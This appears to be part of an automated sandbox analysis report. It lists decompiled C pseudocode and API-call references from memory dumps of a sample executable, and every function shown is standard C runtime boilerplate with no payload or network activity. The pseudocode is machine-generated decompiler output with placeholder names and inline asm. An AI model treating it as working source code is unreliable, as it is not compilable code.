    						_t21 = _t32[1];
    						if(_t21 != 0) {
    							InterlockedDecrement(_t21);
    						}
    					}
    					_t32 =  &(_t32[4]);
    					_t11 =  &_a4;
    					 *_t11 = _a4 - 1;
    				} while ( *_t11 != 0);
    				InterlockedDecrement(_t34[0x35] + 0xb4);
    				goto L18;
    			}

    APIs
    • InterlockedDecrement.KERNEL32(?), ref: 03006601
    • InterlockedDecrement.KERNEL32(?), ref: 0300660E
    • InterlockedDecrement.KERNEL32(?), ref: 0300661B
    • InterlockedDecrement.KERNEL32(?), ref: 03006628
    • InterlockedDecrement.KERNEL32(?), ref: 03006635
    • InterlockedDecrement.KERNEL32(?), ref: 03006651
    • InterlockedDecrement.KERNEL32(00000000), ref: 03006661
    • InterlockedDecrement.KERNEL32(?), ref: 03006677
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E03006558(LONG* _a4) {
    				LONG* _t15;
    				LONG* _t16;
    				LONG* _t17;
    				LONG* _t18;
    				LONG* _t19;
    				LONG* _t20;
    				long* _t30;
    				LONG* _t31;
    
    				_t31 = _a4;
    				InterlockedIncrement(_t31);
    				_t15 = _t31[0x2c];
    				if(_t15 != 0) {
    					InterlockedIncrement(_t15);
    				}
    				_t16 = _t31[0x2e];
    				if(_t16 != 0) {
    					InterlockedIncrement(_t16);
    				}
    				_t17 = _t31[0x2d];
    				if(_t17 != 0) {
    					InterlockedIncrement(_t17);
    				}
    				_t18 = _t31[0x30];
    				if(_t18 != 0) {
    					InterlockedIncrement(_t18);
    				}
    				_t30 =  &(_t31[0x14]);
    				_a4 = 6;
    				do {
    					if( *((intOrPtr*)(_t30 - 8)) != 0x300b974) {
    						_t19 =  *_t30;
    						if(_t19 != 0) {
    							InterlockedIncrement(_t19);
    						}
    					}
    					if( *((intOrPtr*)(_t30 - 4)) != 0) {
    						_t20 = _t30[1];
    						if(_t20 != 0) {
    							InterlockedIncrement(_t20);
    						}
    					}
    					_t30 =  &(_t30[4]);
    					_t11 =  &_a4;
    					 *_t11 = _a4 - 1;
    				} while ( *_t11 != 0);
    				return InterlockedIncrement(_t31[0x35] + 0xb4);
    			}

    APIs
    • InterlockedIncrement.KERNEL32(?), ref: 0300656A
    • InterlockedIncrement.KERNEL32(?), ref: 03006577
    • InterlockedIncrement.KERNEL32(?), ref: 03006584
    • InterlockedIncrement.KERNEL32(?), ref: 03006591
    • InterlockedIncrement.KERNEL32(?), ref: 0300659E
    • InterlockedIncrement.KERNEL32(?), ref: 030065BA
    • InterlockedIncrement.KERNEL32(00000000), ref: 030065CA
    • InterlockedIncrement.KERNEL32(?), ref: 030065E0
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 96%
    			E030063A0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _t47;
    				signed int _t52;
    				signed int _t61;
    				signed int _t62;
    				signed int _t63;
    				long _t64;
    				LONG* _t67;
    				LONG* _t73;
    				intOrPtr _t89;
    				intOrPtr _t97;
    				void* _t98;
    				void* _t101;
    
    				_t101 = __eflags;
    				_t87 = __edx;
    				_push(0x14);
    				_push(0x30098f8);
    				E03005030(__ebx, __edi, __esi);
    				 *(_t98 - 0x20) =  *(_t98 - 0x20) | 0xffffffff;
    				_t89 = E03004D40(__ebx, __edx, _t101);
    				 *((intOrPtr*)(_t98 - 0x24)) = _t89;
    				E03006097(__ebx, __edx, _t89, __esi, _t101);
    				_t47 = E0300613B( *((intOrPtr*)(_t98 + 8)));
    				 *((intOrPtr*)(_t98 + 8)) = _t47;
    				if(_t47 ==  *((intOrPtr*)( *(_t89 + 0x68) + 4))) {
    					_t41 = _t98 - 0x20;
    					 *_t41 =  *(_t98 - 0x20) & 0x00000000;
    					__eflags =  *_t41;
    					L26:
    					return E03005075( *(_t98 - 0x20));
    				}
    				_t73 = E030068EE(0x220);
    				_t103 = _t73;
    				if(_t73 == 0) {
    					goto L26;
    				}
    				memcpy(_t73,  *(_t89 + 0x68), 0x88 << 2);
    				 *_t73 =  *_t73 & 0x00000000;
    				_t52 = E030061B7(0, _t87, _t103,  *((intOrPtr*)(_t98 + 8)), _t73);
    				 *(_t98 - 0x20) = _t52;
    				if(_t52 != 0) {
    					__eflags = _t52 - 0xffffffff;
    					if(_t52 == 0xffffffff) {
    						__eflags = _t73 - 0x300b450;
    						if(_t73 != 0x300b450) {
    							E03006891(_t73);
    						}
    						 *((intOrPtr*)(E03003EA5())) = 0x16;
    					}
    				} else {
    					_t97 =  *((intOrPtr*)(_t98 - 0x24));
    					if(InterlockedDecrement( *(_t97 + 0x68)) == 0) {
    						_t69 =  *(_t97 + 0x68);
    						if( *(_t97 + 0x68) != 0x300b450) {
    							E03006891(_t69);
    						}
    					}
    					 *(_t97 + 0x68) = _t73;
    					InterlockedIncrement(_t73);
    					if(( *(_t97 + 0x70) & 0x00000002) == 0 && ( *0x300b970 & 0x00000001) == 0) {
    						E03006E8E(_t73, InterlockedIncrement, 0xd);
    						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
    						 *0x300c664 = _t73[1];
    						 *0x300c668 = _t73[2];
    						 *0x300c66c = _t73[3];
    						_t61 = 0;
    						while(1) {
    							 *(_t98 - 0x1c) = _t61;
    							if(_t61 >= 5) {
    								break;
    							}
    							 *((short*)(0x300c658 + _t61 * 2)) =  *((intOrPtr*)(_t73 + 0x10 + _t61 * 2));
    							_t61 = _t61 + 1;
    						}
    						_t62 = 0;
    						__eflags = 0;
    						while(1) {
    							 *(_t98 - 0x1c) = _t62;
    							__eflags = _t62 - 0x101;
    							if(_t62 >= 0x101) {
    								break;
    							}
    							 *((char*)(_t62 + 0x300b670)) =  *((intOrPtr*)( &(_t73[7]) + _t62));
    							_t62 = _t62 + 1;
    						}
    						_t63 = 0;
    						__eflags = 0;
    						while(1) {
    							 *(_t98 - 0x1c) = _t63;
    							__eflags = _t63 - 0x100;
    							if(_t63 >= 0x100) {
    								break;
    							}
    							 *((char*)(_t63 + 0x300b778)) =  *((intOrPtr*)( &(_t73[0x47]) + _t63));
    							_t63 = _t63 + 1;
    						}
    						_t64 = InterlockedDecrement( *0x300b878);
    						__eflags = _t64;
    						if(_t64 == 0) {
    							_t67 =  *0x300b878; // 0x12811f8
    							__eflags = _t67 - 0x300b450;
    							if(_t67 != 0x300b450) {
    								E03006891(_t67);
    							}
    						}
    						 *0x300b878 = _t73;
    						InterlockedIncrement(_t73);
    						 *(_t98 - 4) = 0xfffffffe;
    						E03006501();
    					}
    				}
    			}

    APIs
    • __getptd.LIBCMT ref: 030063B0
      • Part of subcall function 03004D40: __amsg_exit.LIBCMT ref: 03004D50
      • Part of subcall function 03006097: __getptd.LIBCMT ref: 030060A3
      • Part of subcall function 03006097: __amsg_exit.LIBCMT ref: 030060C3
      • Part of subcall function 03006097: InterlockedDecrement.KERNEL32(?), ref: 030060F0
      • Part of subcall function 03006097: InterlockedIncrement.KERNEL32(012811F8), ref: 0300611B
      • Part of subcall function 0300613B: GetOEMCP.KERNEL32(00000000), ref: 03006164
      • Part of subcall function 0300613B: GetACP.KERNEL32(00000000), ref: 03006187
      • Part of subcall function 030068EE: Sleep.KERNEL32(00000000,00000001,?,?,03006E19,00000018,03009958,0000000C,03006EA9,?,?,?,03004C5D,0000000D), ref: 0300690F
      • Part of subcall function 030061B7: setSBCS.LIBCMT ref: 030061E4
      • Part of subcall function 030061B7: IsValidCodePage.KERNEL32(-00000030), ref: 0300622A
      • Part of subcall function 030061B7: GetCPInfo.KERNEL32(00000000,?), ref: 0300623D
      • Part of subcall function 030061B7: setSBUpLow.LIBCMT ref: 0300632B
    • InterlockedDecrement.KERNEL32(?), ref: 03006416
    • InterlockedIncrement.KERNEL32(00000000), ref: 0300643B
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • InterlockedDecrement.KERNEL32 ref: 030064CD
    • InterlockedIncrement.KERNEL32(00000000), ref: 030064F1
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 95%
    			E030047F9() {
    				signed int _v8;
    				char _v12;
    				void* __ebx;
    				void* __ecx;
    				WCHAR* _t14;
    				signed int _t17;
    				signed int _t18;
    				signed int _t28;
    				char _t35;
    				WCHAR* _t42;
    				signed int _t47;
    
    				_push(_t31);
    				 *0x300c638 = 0;
    				GetModuleFileNameW(0, 0x300c430, 0x104);
    				_t14 =  *0x3013098; // 0x241806
    				 *0x300bdf4 = 0x300c430;
    				if(_t14 == 0) {
    					L2:
    					_t42 = 0x300c430;
    				} else {
    					_t42 = _t14;
    					if( *_t14 == 0) {
    						goto L2;
    					}
    				}
    				_t17 = E030046A3(_t42,  &_v12, 0, 0,  &_v8);
    				_t28 = _v8;
    				if(_t28 >= 0x3fffffff) {
    					L8:
    					_t18 = _t17 | 0xffffffff;
    				} else {
    					_t35 = _v12;
    					if(_t35 >= 0x7fffffff) {
    						goto L8;
    					} else {
    						_t17 = _t35 + _t28 * 2 + _t35 + _t28 * 2;
    						if(_t17 < _t35 + _t35) {
    							goto L8;
    						} else {
    							_t17 = E030068EE(_t17);
    							_t47 = _t17;
    							if(_t47 == 0) {
    								goto L8;
    							} else {
    								E030046A3(_t42,  &_v12, _t47 + _t28 * 4, _t47,  &_v8);
    								 *0x300bdd4 = _v8 - 1;
    								 *0x300bddc = _t47;
    								_t18 = 0;
    							}
    						}
    					}
    				}
    				return _t18;
    			}

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\obtG43AWHP.exe,00000104), ref: 03004819
    • _wparse_cmdline.LIBCMT ref: 03004843
      • Part of subcall function 030068EE: Sleep.KERNEL32(00000000,00000001,?,?,03006E19,00000018,03009958,0000000C,03006EA9,?,?,?,03004C5D,0000000D), ref: 0300690F
    • _wparse_cmdline.LIBCMT ref: 03004885
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E03003F3E(intOrPtr _a4) {
    				struct HINSTANCE__* _t2;
    
    				_t2 = GetModuleHandleW(L"mscoree.dll");
    				if(_t2 != 0) {
    					_t2 = GetProcAddress(_t2, "CorExitProcess");
    					if(_t2 != 0) {
    						return _t2->i(_a4);
    					}
    				}
    				return _t2;
    			}

    APIs
    • GetModuleHandleW.KERNEL32(mscoree.dll,?,03003F76,?,?,030089F4,000000FF,0000001E,00000001,00000000,00000000,?,030068FF,?,00000001,?), ref: 03003F48
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,03003F76,?,?,030089F4,000000FF,0000001E,00000001,00000000,00000000,?,030068FF,?,00000001), ref: 03003F58
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 91%
    			E030061B7(void* __ecx, void* __edx, void* __eflags, int _a4, int _a8) {
    				signed int _v8;
    				char _v21;
    				char _v22;
    				struct _cpinfo _v28;
    				signed int _v32;
    				int _v36;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t53;
    				int _t56;
    				signed char _t59;
    				int _t61;
    				short* _t62;
    				signed int _t66;
    				signed char* _t78;
    				signed int _t81;
    				int _t82;
    				signed int _t85;
    				intOrPtr* _t86;
    				int _t91;
    				signed char _t92;
    				signed int _t93;
    				int _t95;
    				int _t97;
    				signed int _t98;
    				signed int _t101;
    				intOrPtr* _t104;
    				signed int _t105;
    
    				_t53 =  *0x300bbe4; // 0x1979767b
    				_v8 = _t53 ^ _t105;
    				_t82 = _a8;
    				_t97 = E0300613B(_a4);
    				_t100 = 0;
    				_a4 = _t97;
    				if(_t97 != 0) {
    					_v32 = 0;
    					_t56 = 0;
    					__eflags = 0;
    					while(1) {
    						__eflags =  *((intOrPtr*)(_t56 + 0x300b880)) - _t97;
    						if( *((intOrPtr*)(_t56 + 0x300b880)) == _t97) {
    							break;
    						}
    						_v32 = _v32 + 1;
    						_t56 = _t56 + 0x30;
    						__eflags = _t56 - 0xf0;
    						if(_t56 < 0xf0) {
    							continue;
    						} else {
    							__eflags = _t97 - 0xfde8;
    							if(_t97 == 0xfde8) {
    								L35:
    								_t64 = _t56 | 0xffffffff;
    								__eflags = _t56 | 0xffffffff;
    							} else {
    								__eflags = _t97 - 0xfde9;
    								if(_t97 == 0xfde9) {
    									goto L35;
    								} else {
    									_t56 = IsValidCodePage(_t97 & 0x0000ffff);
    									__eflags = _t56;
    									if(_t56 == 0) {
    										goto L35;
    									} else {
    										_t56 = GetCPInfo(_t97,  &_v28);
    										__eflags = _t56;
    										if(_t56 == 0) {
    											__eflags =  *0x300c654 - _t100; // 0x0
    											if(__eflags != 0) {
    												goto L1;
    											} else {
    												goto L35;
    											}
    										} else {
    											E03006C50(_t82 + 0x1c, _t100, 0x101);
    											_t95 = 1;
    											 *(_t82 + 4) = _t97;
    											 *(_t82 + 0xc) = _t100;
    											__eflags = _v28 - 1;
    											if(_v28 <= 1) {
    												 *(_t82 + 8) = _t100;
    											} else {
    												__eflags = _v22;
    												if(_v22 != 0) {
    													_t104 =  &_v21;
    													while(1) {
    														_t92 =  *_t104;
    														__eflags = _t92;
    														if(_t92 == 0) {
    															goto L29;
    														}
    														_t81 =  *(_t104 - 1) & 0x000000ff;
    														_t93 = _t92 & 0x000000ff;
    														while(1) {
    															__eflags = _t81 - _t93;
    															if(_t81 > _t93) {
    																break;
    															}
    															 *(_t82 + _t81 + 0x1d) =  *(_t82 + _t81 + 0x1d) | 0x00000004;
    															_t81 = _t81 + 1;
    															__eflags = _t81;
    														}
    														_t104 = _t104 + 2;
    														__eflags =  *(_t104 - 1);
    														if( *(_t104 - 1) != 0) {
    															continue;
    														}
    														goto L29;
    													}
    												}
    												L29:
    												_t78 = _t82 + 0x1e;
    												_t91 = 0xfe;
    												do {
    													 *_t78 =  *_t78 | 0x00000008;
    													_t78 =  &(_t78[1]);
    													_t91 = _t91 - 1;
    													__eflags = _t91;
    												} while (_t91 != 0);
    												 *(_t82 + 0xc) = E03005E74( *(_t82 + 4));
    												 *(_t82 + 8) = _t95;
    											}
    											_t97 = _t82 + 0x10;
    											asm("stosd");
    											asm("stosd");
    											asm("stosd");
    											L25:
    											_t100 = _t82;
    											E03005F07(_t82);
    											goto L2;
    										}
    									}
    								}
    							}
    						}
    						goto L36;
    					}
    					E03006C50(_t82 + 0x1c, _t100, 0x101);
    					_t85 = _v32 * 0x30;
    					_v36 = _t100;
    					_t101 = _t85 + 0x300b890;
    					_v32 = _t101;
    					while(1) {
    						L21:
    						__eflags =  *_t101;
    						if( *_t101 == 0) {
    							break;
    						}
    						_t59 =  *(_t101 + 1);
    						__eflags = _t59;
    						if(_t59 != 0) {
    							_t98 =  *_t101 & 0x000000ff;
    							_t66 = _t59 & 0x000000ff;
    							while(1) {
    								__eflags = _t98 - _t66;
    								if(_t98 > _t66) {
    									break;
    								}
    								 *(_t82 + _t98 + 0x1d) =  *(_t82 + _t98 + 0x1d) |  *(_v36 + 0x300b87c);
    								_t66 =  *(_t101 + 1) & 0x000000ff;
    								_t98 = _t98 + 1;
    								__eflags = _t98;
    							}
    							_t97 = _a4;
    							_t101 = _t101 + 2;
    							__eflags = _t101;
    							continue;
    						}
    						break;
    					}
    					_v36 = _v36 + 1;
    					_t101 = _v32 + 8;
    					__eflags = _v36 - 4;
    					_v32 = _t101;
    					if(_v36 < 4) {
    						goto L21;
    					}
    					 *(_t82 + 4) = _t97;
    					 *(_t82 + 8) = 1;
    					_t61 = E03005E74(_t97);
    					 *(_t82 + 0xc) = _t61;
    					_t62 = _t82 + 0x10;
    					_t86 = _t85 + 0x300b884;
    					_t95 = 6;
    					do {
    						 *_t62 =  *_t86;
    						_t86 = _t86 + 2;
    						_t62 = _t62 + 2;
    						_t95 = _t95 - 1;
    						__eflags = _t95;
    					} while (_t95 != 0);
    					goto L25;
    				} else {
    					L1:
    					E03005EA3(_t82);
    					L2:
    					_t64 = 0;
    				}
    				L36:
    				return E03006BA0(_t64, _t82, _v8 ^ _t105, _t95, _t97, _t100);
    			}

    APIs
      • Part of subcall function 0300613B: GetOEMCP.KERNEL32(00000000), ref: 03006164
      • Part of subcall function 0300613B: GetACP.KERNEL32(00000000), ref: 03006187
    • IsValidCodePage.KERNEL32(-00000030), ref: 0300622A
    • GetCPInfo.KERNEL32(00000000,?), ref: 0300623D
    • setSBUpLow.LIBCMT ref: 0300632B
      • Part of subcall function 03005F07: GetCPInfo.KERNEL32(?,?), ref: 03005F28
      • Part of subcall function 03005F07: ___crtGetStringTypeA.LIBCMT ref: 03005FA5
      • Part of subcall function 03005F07: ___crtLCMapStringA.LIBCMT ref: 03005FC5
      • Part of subcall function 03005F07: ___crtLCMapStringA.LIBCMT ref: 03005FEA
    • setSBCS.LIBCMT ref: 030061E4
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E030083B7(void* __ecx, intOrPtr __edx, intOrPtr* _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
    				signed int _v8;
    				int _v12;
    				void* _v24;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t27;
    				intOrPtr _t33;
    				int _t37;
    				void* _t40;
    				short* _t41;
    				short* _t47;
    				intOrPtr _t48;
    				intOrPtr _t54;
    				int _t56;
    				intOrPtr _t57;
    				intOrPtr _t60;
    				signed int _t61;
    				short* _t62;
    
    				_t54 = __edx;
    				_push(__ecx);
    				_push(__ecx);
    				_t27 =  *0x300bbe4; // 0x1979767b
    				_v8 = _t27 ^ _t61;
    				_t47 = 0;
    				_v12 = 0;
    				if(_a24 == 0) {
    					_a24 =  *((intOrPtr*)( *_a4 + 4));
    				}
    				_t56 = MultiByteToWideChar(_a24, 1 + (0 | _a28 != _t47) * 8, _a12, _a16, _t47, _t47);
    				if(_t56 != _t47) {
    					if(__eflags > 0) {
    						__eflags = _t56 - 0x7ffffff0;
    						if(_t56 <= 0x7ffffff0) {
    							_t16 = _t56 + 8; // 0x8
    							_t40 = _t56 + _t16;
    							__eflags = _t40 - 0x400;
    							if(_t40 > 0x400) {
    								_t41 = E030089C5(_t54, _t56, MultiByteToWideChar, _t40);
    								__eflags = _t41 - _t47;
    								if(_t41 != _t47) {
    									 *_t41 = 0xdddd;
    									goto L11;
    								}
    							} else {
    								E03009200(_t40);
    								_t41 = _t62;
    								__eflags = _t41 - _t47;
    								if(_t41 != _t47) {
    									 *_t41 = 0xcccc;
    									L11:
    									_t41 =  &(_t41[4]);
    									__eflags = _t41;
    								}
    							}
    							_t47 = _t41;
    						}
    					}
    					__eflags = _t47;
    					if(_t47 == 0) {
    						goto L3;
    					} else {
    						E03006C50(_t47, 0, _t56 + _t56);
    						_t37 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t47, _t56);
    						__eflags = _t37;
    						if(_t37 != 0) {
    							_v12 = GetStringTypeW(_a8, _t47, _t37, _a20);
    						}
    						E0300816A(_t47);
    						_t33 = _v12;
    					}
    				} else {
    					L3:
    					_t33 = 0;
    				}
    				_pop(_t57);
    				_pop(_t60);
    				_pop(_t48);
    				return E03006BA0(_t33, _t48, _v8 ^ _t61, _t54, _t57, _t60);
    			}























    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000100,?,?,?,?,?,030084CC,?,00000000,?), ref: 03008401
      • Part of subcall function 030089C5: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,030068FF,?,00000001,?,?,03006E19,00000018,03009958,0000000C,03006EA9), ref: 03008A0A
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0300846B
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 03008479
    • __freea.LIBCMT ref: 03008483
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 58%
    			E03004BD6() {
    				signed int _t3;
    				long _t4;
    				struct _CRITICAL_SECTION* _t5;
    				struct _CRITICAL_SECTION* _t14;
    				signed int* _t17;
    				struct _CRITICAL_SECTION** _t18;
    
    				_t3 =  *0x300b1c0; // 0x3
    				if(_t3 != 0xffffffff) {
    					__imp__DecodePointer( *0x300c648, _t3);
    					 *_t3();
    					 *0x300b1c0 =  *0x300b1c0 | 0xffffffff;
    				}
    				_t4 =  *0x300b1c4; // 0x14
    				if(_t4 != 0xffffffff) {
    					TlsFree(_t4);
    					 *0x300b1c4 =  *0x300b1c4 | 0xffffffff;
    				}
    				_t17 = 0x300bbf0;
    				do {
    					_t14 =  *_t17;
    					if(_t14 != 0 && _t17[1] != 1) {
    						DeleteCriticalSection(_t14);
    						E03006891(_t14);
    						 *_t17 =  *_t17 & 0x00000000;
    					}
    					_t17 =  &(_t17[2]);
    				} while (_t17 < 0x300bd10);
    				_t18 = 0x300bbf0;
    				do {
    					_t5 =  *_t18;
    					if(_t5 != 0 && _t18[1] == 1) {
    						DeleteCriticalSection(_t5);
    					}
    					_t18 =  &(_t18[2]);
    				} while (_t18 < 0x300bd10);
    				return _t5;
    			}










    APIs
    • DecodePointer.KERNEL32(00000003,03004FFF,?,03002D9E), ref: 03004BE7
    • TlsFree.KERNEL32(00000014,03004FFF,?,03002D9E), ref: 03004C01
    • DeleteCriticalSection.KERNEL32(00000000,00000000,774FA0FD,?,03004FFF,?,03002D9E), ref: 03006D7B
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
    • DeleteCriticalSection.KERNEL32(00000014,774FA0FD,?,03004FFF,?,03002D9E), ref: 03006DA5
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 81%
    			E03006097(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t15;
    				LONG* _t21;
    				void* _t31;
    				LONG* _t33;
    				void* _t34;
    				void* _t35;
    
    				_t35 = __eflags;
    				_t29 = __edx;
    				_t25 = __ebx;
    				_push(0xc);
    				_push(0x30098d8);
    				E03005030(__ebx, __edi, __esi);
    				_t31 = E03004D40(__ebx, __edx, _t35);
    				_t15 =  *0x300b970; // 0xfffffffe
    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
    					E03006E8E(_t25, _t31, 0xd);
    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
    					_t33 =  *(_t31 + 0x68);
    					 *(_t34 - 0x1c) = _t33;
    					__eflags = _t33 -  *0x300b878; // 0x12811f8
    					if(__eflags != 0) {
    						__eflags = _t33;
    						if(__eflags != 0) {
    							__eflags = InterlockedDecrement(_t33);
    							if(__eflags == 0) {
    								__eflags = _t33 - 0x300b450;
    								if(__eflags != 0) {
    									E03006891(_t33);
    								}
    							}
    						}
    						_t21 =  *0x300b878; // 0x12811f8
    						 *(_t31 + 0x68) = _t21;
    						_t33 =  *0x300b878; // 0x12811f8
    						 *(_t34 - 0x1c) = _t33;
    						InterlockedIncrement(_t33);
    					}
    					 *(_t34 - 4) = 0xfffffffe;
    					E03006132();
    				} else {
    					_t33 =  *(_t31 + 0x68);
    				}
    				_t38 = _t33;
    				if(_t33 == 0) {
    					_push(0x20);
    					E0300420B(_t29, _t38);
    				}
    				return E03005075(_t33);
    			}










    APIs
    • __getptd.LIBCMT ref: 030060A3
      • Part of subcall function 03004D40: __amsg_exit.LIBCMT ref: 03004D50
    • __amsg_exit.LIBCMT ref: 030060C3
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • InterlockedDecrement.KERNEL32(?), ref: 030060F0
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
    • InterlockedIncrement.KERNEL32(012811F8), ref: 0300611B
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 58%
    			E03004CC7(void* __ebx) {
    				void* __edi;
    				void* __esi;
    				long _t3;
    				long* _t7;
    				void* _t8;
    				long _t11;
    				long _t18;
    				long* _t19;
    
    				_t3 = GetLastError();
    				_push( *0x300b1c0);
    				_t18 = _t3;
    				_t19 =  *((intOrPtr*)(E03004BA2()))();
    				if(_t19 == 0) {
    					_t7 = E03006933(1, 0x214);
    					_t19 = _t7;
    					if(_t19 != 0) {
    						__imp__DecodePointer( *0x300c644,  *0x300b1c0, _t19);
    						_t8 =  *_t7();
    						_t22 = _t8;
    						if(_t8 == 0) {
    							E03006891(_t19);
    							_t19 = 0;
    							__eflags = 0;
    						} else {
    							_push(0);
    							_push(_t19);
    							E03004C13(__ebx, _t18, _t19, _t22);
    							_t11 = GetCurrentThreadId();
    							_t19[1] = _t19[1] | 0xffffffff;
    							 *_t19 = _t11;
    						}
    					}
    				}
    				SetLastError(_t18);
    				return _t19;
    			}












    APIs
    • GetLastError.KERNEL32(?,?,03003EAA,03002BF3), ref: 03004CCB
